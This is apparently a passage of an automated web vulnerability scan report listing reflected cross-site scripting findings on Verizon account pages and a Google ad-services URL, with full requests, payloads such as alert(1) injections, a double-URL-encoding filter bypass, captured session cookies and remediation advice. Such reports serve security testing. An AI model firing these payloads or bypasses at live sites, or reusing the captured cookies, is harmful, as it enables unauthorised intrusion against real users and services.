<!-- Vignette V6 Fri Nov 19 18:15:10 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc";f834175335c';
<!-- Vignette V6 Fri Nov 19 18:15:10 2010 -->
...[SNIP]...

2.851. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9ae3%2522%253b2b2df0af655 was submitted in the REST URL parameter 4. This input was echoed as a9ae3";2b2df0af655 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspxa9ae3%2522%253b2b2df0af655?98d8b"%3bdc8f525814c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: AIMSPRESESSIONIDSIT=jQYXMpLTbQYsW1pVn7qH7HGykY9NkVJsCdW9m8yWY2jTQWtljvZT!-613549238!1160490364; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&lec=&dsl=&fios=&fiostvown=&fiosvoice=&vzw=&vca=&mm=&msv=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; RegistrationApp=SessionId=f55316e8-f8cb-4558-b902-f2f1c57392c6; VZGEO=west; ASP.NET_SessionId=34uu01450yinef55zsswbo55
Host: www36.verizon.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
Content-Length: 27

renderableItem=%2Fshow%2F21

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sun, 21 Nov 2010 22:35:19 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=HPADIODCEAAAOFHDBAGLDEPH; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sun, 21-Nov-2010 22:40:19 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 128966

<!-- Vignette V6 Sun Nov 21 14:35:18 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspxa9ae3";2b2df0af655?98d8b";dc8f525814c=1';
<!-- Vignette V6 Sun Nov 21 14:35:18 2010 -->
...[SNIP]...

2.852. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d8b"%3bdc8f525814c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98d8b";dc8f525814c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b"%3bdc8f525814c=1 HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7199
Date: Sat, 20 Nov 2010 03:04:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=NFJIEODCIOLCEPMOHFJNOAHN; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 03:09:34 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129020

<!-- Vignette V6 Fri Nov 19 19:04:33 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b";dc8f525814c=1';
<!-- Vignette V6 Fri Nov 19 19:04:33 2010 -->
...[SNIP]...

2.853. https://www36.verizon.com/FiOSVoice/members/CallsandMessages.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /FiOSVoice/members/CallsandMessages.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 575f9'%3b59cfc6b5eb6 was submitted in the REST URL parameter 2. This input was echoed as 575f9';59cfc6b5eb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2947
Expires: Sat, 20 Nov 2010 03:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:23 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=yx3n03emjvwwvqfejmdrmu55; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspx&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navig
...[SNIP]...

2.854. https://www36.verizon.com/FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload aa6f6(a)6f7011a9368 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /FiOSVoice/members575f9'%3b59cfc6b5eb6aa6f6(a)6f7011a9368/CallsandMessages.aspx HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&lec=&dsl=&fios=&fiostvown=&fiosvoice=&vzw=&vca=&mm=&msv=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; AIMSPRESESSIONIDSIT=jQYXMpLTbQYsW1pVn7qH7HGykY9NkVJsCdW9m8yWY2jTQWtljvZT!-613549238!1160490364; RegistrationApp=SessionId=f55316e8-f8cb-4558-b902-f2f1c57392c6; VZGEO=west
Host: www36.verizon.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
Content-Length: 27

renderableItem=%2Fshow%2F20

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Expires: Sun, 21 Nov 2010 22:33:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 22:33:11 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=g4av3k55wzwokiaq4ou4if55; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6aa6f6(a)6f7011a9368/CallsandMessages.aspx&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navig
...[SNIP]...

2.855. https://www36.verizon.com/FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb871'%3b7bc1b8e11eb was submitted in the REST URL parameter 2. This input was echoed as eb871';7bc1b8e11eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /FiOSVoice/eb871'%3b7bc1b8e11eb/CallsandMessages.aspx HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&lec=&dsl=&fios=&fiostvown=&fiosvoice=&vzw=&vca=&mm=&msv=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; AIMSPRESESSIONIDSIT=jQYXMpLTbQYsW1pVn7qH7HGykY9NkVJsCdW9m8yWY2jTQWtljvZT!-613549238!1160490364; RegistrationApp=SessionId=f55316e8-f8cb-4558-b902-f2f1c57392c6; VZGEO=west
Host: www36.verizon.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
Content-Length: 27

renderableItem=%2Fshow%2F20

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2940
Expires: Sun, 21 Nov 2010 22:33:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 22:33:07 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=2i2idc45mn1wkm45syneduzb; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/eb871';7bc1b8e11eb/CallsandMessages.aspx&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navig
...[SNIP]...

2.856. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [aspxerrorpath parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiosvoice/PageNotFound.aspx

Issue detail

The value of the aspxerrorpath request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b960d(a)11e9ac1f3d8 was submitted in the aspxerrorpath parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspxb960d(a)11e9ac1f3d8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&lec=&dsl=&fios=&fiostvown=&fiosvoice=&vzw=&vca=&mm=&msv=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; AIMSPRESESSIONIDSIT=jQYXMpLTbQYsW1pVn7qH7HGykY9NkVJsCdW9m8yWY2jTQWtljvZT!-613549238!1160490364; RegistrationApp=SessionId=f55316e8-f8cb-4558-b902-f2f1c57392c6; VZGEO=west
Host: www36.verizon.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Expires: Sun, 21 Nov 2010 22:33:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 22:33:19 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=jw0mkz454nt50k454xl5rv55; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspxb960d(a)11e9ac1f3d8&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navigator.vendor;
if(doc
...[SNIP]...

2.857. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [aspxerrorpath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiosvoice/PageNotFound.aspx

Issue detail

The value of the aspxerrorpath request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d644f'-alert(1)-'b154110fe37 was submitted in the aspxerrorpath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fiosvoice/PageNotFound.aspx?aspxerrorpath=d644f'-alert(1)-'b154110fe37 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&lec=&dsl=&fios=&fiostvown=&fiosvoice=&vzw=&vca=&mm=&msv=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; AIMSPRESESSIONIDSIT=jQYXMpLTbQYsW1pVn7qH7HGykY9NkVJsCdW9m8yWY2jTQWtljvZT!-613549238!1160490364; RegistrationApp=SessionId=f55316e8-f8cb-4558-b902-f2f1c57392c6; VZGEO=west
Host: www36.verizon.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2917
Expires: Sun, 21 Nov 2010 22:33:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 22:33:18 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=1y4r5255f1jgzu45wdjjfq55; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=d644f'-alert(1)-'b154110fe37&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navigator.vendor;
if(doc
...[SNIP]...

2.858. https://www36.verizon.com/fiosvoice/PageNotFound.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiosvoice/PageNotFound.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0408(a)0b026e82c6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspx&c0408(a)0b026e82c6e=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&lec=&dsl=&fios=&fiostvown=&fiosvoice=&vzw=&vca=&mm=&msv=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; AIMSPRESESSIONIDSIT=jQYXMpLTbQYsW1pVn7qH7HGykY9NkVJsCdW9m8yWY2jTQWtljvZT!-613549238!1160490364; RegistrationApp=SessionId=f55316e8-f8cb-4558-b902-f2f1c57392c6; VZGEO=west
Host: www36.verizon.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2969
Expires: Sun, 21 Nov 2010 22:33:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 22:33:24 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=lquipn3aytry2weagxnlkd45; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspx&c0408(a)0b026e82c6e=1&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navigator.vendor;
if(d
...[SNIP]...

2.859. http://www.googleadservices.com/pagead/aclk [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bf00"><script>alert(1)</script>a0d97c7993e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pagead/aclk?sa=L&ai=CMT8RHyLpTOWXBMK9gwfnr8T1Cp-16tYBt8T52BLVu5oFEAQg-_6BAygFUOH3_t_6_____wFgyYb0hsijkBmgAaX8yfoDyAEBqgQaT9BVo_l22TrtV3Q31vG1ImlcYu1N_mX9hFo&num=4&val=ChA1MzIyM2IzYWE2MDg4ZjU0EOOmg-cEGgg6gWoCtyuBQCABKAAwn_PKhq6VmqhjOPGV3OYEQPGV3OYE&sig=AGiWqtyfrscdD923B8IVsWWDBuKf3f1h-A&adurl=http://www.directpointe.com/landing_pages/states/california.aspx HTTP/1.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=7bf00"><script>alert(1)</script>a0d97c7993e
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.googleadservices.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 13:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=exrpxzv15xk2u5buf1goay45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href="../../App_T
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=7bf00"><script>alert(1)</script>a0d97c7993e" />
...[SNIP]...

